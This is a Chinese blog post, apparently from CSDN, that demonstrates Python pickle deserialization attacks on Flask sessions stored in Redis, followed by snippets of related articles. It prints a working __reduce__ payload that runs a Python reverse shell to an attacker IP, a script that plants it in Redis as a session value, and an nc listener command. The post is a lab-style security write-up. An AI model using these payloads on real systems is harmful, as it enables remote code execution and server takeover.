python pickle反序列化漏洞_Python反序列化安全问题

最新推荐文章于 2024-06-24 15:00:36 发布
最新推荐文章于 2024-06-24 15:00:36 发布
阅读量430 收藏 1
点赞数
文章标签: python pickle反序列化漏洞

Python 反序列化安全问题(一)

这一段时间使用flask做web开发,使用了redis存储session,阅读了flask_session源码,发现在存储session到redis过程中,利用了cPickle模块进行序列化以及反序列化;正好根据该样例学习一波Python反序列化相关的安全问题,不足之处请各位表哥指出。

一、基础知识讲解

1.1 cPickle模块

Python中主要是用cPickle和pickle,前者是使用C语言实现,速度可达到后者的1000倍,使用范围较广(文档链接)

cPickle可以序列化很多类型的对象,详情见文档。基础语法就是:

import cPickle

a = 1

b = cPickle.dumps(a)

cPickle.loads(b)

文档中需要特别关注的是11.1.5.2,Pickling and unpickling extension types

这一节主要内容就是讲述cPickle序列化以及反序列化扩展类的过程,原文有一句我并没有完全理解意思:

When the Pickler encounters an object of a type it knows nothing about — such as an extension type

初始理解的意思是:当遇到解释器一无所知的扩展类型的时候,但是对于理解的这句话,扩展类型是什么意思?后来想到Python中元类是type,这里extension types应该理解为type类型的class。

class A(): # 旧类

pass

type(A)

class B(object): # 新类

pass

type(B)

所以说这一节主要针对的应该是新类,即 class A(object) 此种写法创建的类(存疑,待补充完善);当序列化以及反序列化的过程中中碰到未知类的时候,可以通过类中定义的__reduce__方法来告知如何进行序列化或者反序列化,该方法可以返回string和tuple类型;问题主要出在tuple类型(后面会细述),通过构造__reduce__可达到命令执行的目的:

import cPickle

import os

class A(object):

def __reduce__(self):

a = 'whoami'

return (os.system,(a,))

b=A()

result = cPickle.dumps(b)

cPickle.loads(result)

使用上述命令即可执行whoami命令。同时也可以利用该方式反弹shell:

import cPickle

import os

class A(object):

def __reduce__(self):

a = """python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.85.0.76",9001));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'"""

return (os.system,(a,))

b=A()

result = cPickle.dumps(b)

cPickle.loads(result)

然后在10.85.0.76执行nc -lvvp 9001,即可成功获取shell。

1.2 flask_session

因为本次测试主要是依托于flask和redis,所以首先介绍一下flask_session。

flask中默认使用客户端session,如果想要配置服务端session,就需要使用flask_session配合Redis(后面皆以Redis为主)或者其他数据库。flask_session使用Redis存储session的过程(主要使用如下的接口实现,只展示部分代码):

class RedisSessionInterface(SessionInterface):

serializer = pickle # 上文模块导入 import cPickle as pickle

session_class = RedisSession

def open_session(self, app, request): # 获取session

……

val = self.redis.get(self.key_prefix + sid)

if val is not None:

try:

data = self.serializer.loads(val) ## 将session值取出后反序列化

return self.session_class(data, sid=sid)

except:

return self.session_class(sid=sid, permanent=self.permanent)

return self.session_class(sid=sid, permanent=self.permanent)

def save_session(self, app, session, response): # 存储session

……

val = self.serializer.dumps(dict(session)) ## 将session值序列化存储到redis

上述过程简单说就是:session存取过程存在序列化和反序列化的过程。

session在Redis中以键值对(key,value)的形式存储。假设我们能够操纵Redis中的键值对,将某个key的值设为我们序列化后恶意代码(比如上面反弹shell的代码样例),然后在将自身的cookie设置为该key,在访问网站的时候,服务端会对于根据key查找value并进行反序列化,进而反弹shell。下面对于该想法进行测试

二、 漏洞测试

测试环境:

victim:Ubuntu 14.04、Redis 2.8.4、IP:10.85.0.54

attacker:Win10、IP:10.85.0.76

2.1 构建服务端

此处我用flask编写了一个服务端样例:

import redis

import os

from flask import Flask,session

from flask_session import Session

app = Flask(__name__)

SESSION_TYPE = 'redis'

SESSION_PERMANENT = False

SESSION_USE_SIGNER = False

SESSION_KEY_PREFIX = 'session'

SESSION_REDIS = redis.Redis(host='127.0.0.1',port='6379')

SESSION_COOKIE_HTTPONLY = True

PERMANENT_SESSION_LIFETIME = 604800 # 7 days

app.config.from_object(__name__)

Session(app)

@app.route('/')

def hello_world():

session['name']='test'

return 'Hello World!'

if __name__ == '__main__':

app.run(host='0.0.0.0')

将上述代码保存为app.py,第三方库安装完毕后,在服务器上运行

python app.py

即可在5000端口启动简单的服务端,访问如图所示,红框中是我们的sid,也是服务端查找session内容的key(因为设置了前缀,所以redis中key应该是session+sid):

2.2 更改session

此时如果说我们将value设置为恶意代码会怎么样?

import cPickle

import os

import redis

class A(object):

def __reduce__(self):

a = """python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.85.0.76",9001));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'"""

return (os.system,(a,))

b=A()

result = cPickle.dumps(b)

r = redis.Redis(host='127.0.0.1',port=6379)

r.set('此处为'session'和你的sid拼接',result)

运行上述代码后,我们可以发现我们的session内容变成下图所示内容:

2.3 反弹shell

此时在attacker监听9001端口:

nc -lvvp 9001

然后刷新浏览器中访问页面,发现成功反弹shell:

三、emmmm

目前很多Python的Web应用都用Redis等NoSQL进行session存储,当攻击者有机会去操纵服务端的session的时候(比如Redis未授权访问),配合反序列化漏洞即可执行命令。上述提到的两个库cPickle和pickle,两个库实现的功能基本相似,后面会对于Python实现的pickle库进行分析为何会出现命令执行的漏洞。

weixin_39997194
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
python pickle漏洞
weixin_44687621的博客
07-27 610
python反序列化漏洞 1.使用pickle库对对象进行序列化和反序列化操作 json反序列化 import json dict={"admin":"123"} json_info = json.dumps(dict) print(str(type(json_info))+json_info) dict1=json.loads(json_info) print(str(type(dict1))) print(dict) pickle反序列化 import pickle class Test:
Python Pickle反序列化漏洞
Lemon's blog
11-15 4565
前言: 刷题的时候做了一道[CISCN2019]ikun的题目,提示考察的知识点是Python Pickle,之前接触的都是有关PHP反序列化,这次就来好好学习一下Python Pickle反序列化漏洞。 基础知识 0x00:Pickle库及函数 picklepython语言的一个标准模块,实现了基本的数据序列化和反序列化pickle模块是以二进制的形式序列化后保存到文件中(保存文件的后缀为.pkl),不能直接打开进行预览。 函数 说明 dumps 对象反序列化为bytes对象
python pickle反序列化漏洞_Python反序漏洞分析
weixin_39960147的博客
12-08 484
什么是序列化?程序运行的过程中,变量都是在内存中的,当程序一旦执行完毕结束退出后,变量占有的内存就被释放。如果将内存中的变量持久化存储到磁盘中,这个过程就成为序列化;下次运行的时候从磁盘中读取变量到内存中,这个过程就成为反序列化。在python中序列化称为pickling,反序列化被称为pickling;在php中序列化被称为serialization,反序列化被称为unserialization...
python pickle反序列化漏洞
weixin_43610673的博客
05-20 3015
前置知识 什么是pickle picklePython专用的一个进行序列化和反序列化的工具包,pickle能表示Python几乎所有的类型(包括自定义类型),由一系列opcode组成,模拟了类似堆栈的内存。 与PHP序列化或者JSON,这些以键值对形式存储序列化对象数据的不同,pickle 序列化(Python独有)是将一个 Python 对象及其所拥有的层次结构变成可以持久化储存的二进制数据,无法像JSON 一样直观阅读。在Python中,采用术语 封存 (pickling)和 解封 (unpickli
详解python pickle中的反序列化漏洞
最新发布
公众号:该用户快成仙了
06-24 875
反序列化过程有漏洞:如果我们反序列化了一个不可信的数据源,那就可能引发反序列化攻击。攻击者可以在序列化的数据里嵌入恶意代码,当你反序列化这个数据时,这些恶意代码就被执行,可能导致数据泄露、系统崩溃,甚至让攻击者远程控制你的系统。Pickle模块Python自带的,它主要用来序列化和反序列化Python对象。你可以用Pickle把任何Python对象(包括复杂的数据结构)保存成字节流,然后在需要的时候再加载回来。Pickle的工作原理Pickle的工作原理其实很简单。
Python反序列化漏洞及魔术方法详细全解(链构造、自动审计工具bandit)
ran的博客
04-17 2596
魔术方法执行调用下面的代码,如果下面的代码可控的话,就可能存在反序列化漏洞pickle.dump(obj, file) :将对象序列化后保存到文件。 pickle.load(file) :读取文件, 将文件中的序列化内容反序列化为对象。 pickle.dumps(obj) :将对象序列化成字符串格式的字节流。 pickle.loads(bytes_obj) :将字符串格式的字节流反序列化为对象。寻找LV6 -> 购买修改支付逻辑 -> 绕过admin限制需修改jwt值 -> 爆破jwt密匙 -> 重组jw
Python反序列化漏洞(入门)
xiaoheizi的博客
07-02 366
_reduce__()魔术方法,魔术方法中执行了传递的参数,参数意思是:执行调用计算器的系统命令。__reduce__()和__reduce_ex__()魔术方法:对象被反序列化时自动调用。__setstate__()魔术方法:对象被反序列化时自动调用。__getstate__()魔术方法: 对象被序列化时自动调用。读取文件, 将文件中的序列化内容反序列化为对象。安装后在当前Python目录下script。将字符串格式的字节流反序列化为对象。安装后在当前Python目录下。parseObject等。
python反序列化漏洞 任意代码执行
01-20
这篇博客我将介绍 python反序列化漏洞 任意代码执行 那么怎么反序列化中运行任意代码呢? 首先要说说__reduce__这个魔术方法, 这个方法用来表明类的对象应当如何序列化, 当其返回tuple类型时就可以实现任意代码...
Python3.5 Json与pickle实现数据序列化与反序列化操作示例
09-19
Python3.5中的数据序列化和反序列化是将数据对象转化为可持久化的格式,以便存储或传输。这里主要讨论两种常见的序列化库:Json和pickle。 1. Json: Json (JavaScript Object Notation) 是一种轻量级的数据交换...
Python使用pickle进行序列化和反序列化的示例代码
12-16
Pythonpickle模块是一个强大的工具,用于对象的序列化和反序列化。序列化是将对象转换为可存储或传输的数据格式的过程,而反序列化则是将这种格式恢复为原始对象的过程。在Python中,pickle模块提供了这个功能,...
Python中shelve序列化与反序列化
12-22
反之,则称为反序列化 shelve shelve是一个简单的数据存储方案,类似key-value数据库,可以很方便的保存python对象,其内部是通过pickle协议来实现数据序列化。shelve只有一个open()函数,这个函数用于打开指定的...
详解Python中的序列化与反序列化的使用
09-21
Python中的序列化与反序列化是将对象的状态转化为可存储或传输的形式,以便于之后恢复对象的...不过,要注意序列化可能存在安全风险,因为pickle模块可能执行任意的Python代码,因此在处理不可信数据时应当谨慎使用。
Python Pickle 反序列化漏洞
qq_46001025的博客
10-05 239
需要注意的一点:注意:对于我们自己定义的class,如果直接以 data=‘aaa’ 的方式赋初值,则这个date不被打包,解决方案是写一个__init__()方法。python反序列化漏洞产生和php的魔术方法有异曲同工之处,在Python2中的 __reduce__() 方法,在每次的反序列化开始或结束时调用。字节码,如果python有写入的权限,那么生成一个 .pyc 的字节码文件,若没有那就再内存中生成字节码,程序结束后丢弃。(以下称为机器吧)维护了两个东西:栈区和存储区。
python安全Pickle反序列化漏洞学习。
Mrs_H的博客
10-28 1956
前言 写这篇文章的起因是两次遇到python pickle的题目都只做到了命令执行的程度,但都没有反弹shell。看别人的wp都是通过curl将flag拉到vps上的,怎么说呢,死于没有公网IP。虽然之前在做题的时候,照着网上的exp可以把自己的payload改个七七八八,但是说实话我距离真正意义上的“手撸”opcode还是有着一段距离。这篇文章主要还是通过我所遇到的pickle反序列化题目出发进行编写,当然也少不了pickle的原理部分。 正文 在正式开始这篇文章之前,我想先贴出一位大佬的文章Pion1e
[python]pickle反序列化漏洞(未完结)
山可行,海可平
03-29 5424
基础知识 实现:pickle或cpickle,二者仅实现语言不同(前纯python,后C),而cPickle性能更好 pickle库 标注库,实现了数据序列化和反序列化 pickle模块是以二进制的形式序列化后保存到文件(后缀:.pkl),不能直接打开 序列化后字符串的表意、序列化的规则->PVM(python序列化和反序列化过程最根本的) PVM 解释字节码的解释引擎 执行流程 PVM将源码编译成字节码 python将编译好的字节码转发到PVM(python虚拟机),PVM循环迭代执行字节码指令
PySpark tutorial 学习笔记6——Serializers
daisy的博客
07-25 485
Serializers Serializers用于Apache Spark的性能调优。 通过网络发送或写入磁盘或持久存储在内存中的所有数据都应该序列化. PySpark支持用于性能调优的自定义序列化程序。 PySpark支持以下两个序列化程序 -  MarshalSerializer 使用Python的Marshal Serializer序列化对象。 此序列化程序比PickleSeriali...
PyYaml反序列化漏洞详解
2302_76827504的博客
04-27 591
果listitems不为空,则调用instance的extend()方法,将listitems中的所有元素添加到instance列表对象的末尾,instance是我们创建的实例,这里并没有定义listitems是什么,如果我们的listitems是一个字典,而且其内容有"{‘extend’:function}",这样的话,我们就可以利用extend进行任意函数的执行了。在这个方法中,data是一个包含YAML格式字符串的变量,可以是从文件中读取的字符串,也可以是用户输入的字符串等。ddd的值为666。
PythonPickle/PyTorch反序列化漏洞
兴趣使然的创作者
02-28 1268
一个漏洞
安全反序列化_Python Pickle 反序列化安全问题
weixin_39595487的博客
12-11 850
Python Pickle反序列化安全问题python中,相比于存储一个数字或者字符串,如果我们想要存储一个字典、列表或者对象,似乎并没有那么容易。但python和PHP等其他语言一样,也提供了一种序列化和反序列化的方法用来解决这个问题:我们可以把他们“序列化”成一种符合特殊规范的字符串,然后将其存储到一个文件当中。当我们想要获取该元素的时候,可以从文件中读取对应的字符串来进行“反序列...
BUUCTF pickle反序列化漏洞
09-07
BUUCTF中的Pickle反序列化漏洞是指在该比赛的题目中存在通过反序列化攻击来执行任意代码的漏洞。具体来说,这个漏洞利用Python中的pickle模块pickle模块可以将对象序列化为字符串并保存到文件或通过网络传输。...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值